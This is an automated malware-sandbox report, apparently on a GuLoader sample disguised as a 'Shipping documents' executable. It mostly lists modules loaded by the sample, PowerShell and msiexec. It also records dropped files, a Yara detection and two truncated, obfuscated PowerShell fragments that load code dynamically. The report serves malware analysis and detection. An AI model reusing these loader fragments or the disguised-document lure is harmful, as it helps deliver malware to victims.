Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Shipping documents 000309498585956000797900.exe

Static file information: File size 1081112 > 1048576

Source: Shipping documents 000309498585956000797900.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2915880878.00000000081B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB[ source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2915999268.00000000081C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Antiadiaphorist $Undersgelseskommisions $Fyringsolien), (Zonelovgivning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Diakonater = [AppDomain]::CurrentDo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Wist)), $Nedskrende).DefineDynamicModule($Stningsstykkets, $false).DefineType($ostensibly, $Zairiskes, [System.MulticastDelegate])$Run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0675CB88 push BC07EC88h; ret	1_2_0675CB8D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00370C55 push edi; retf	6_2_00370C7A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27983FC8 push 2427A8DAh; retf	6_2_27983FD5

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	File created: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
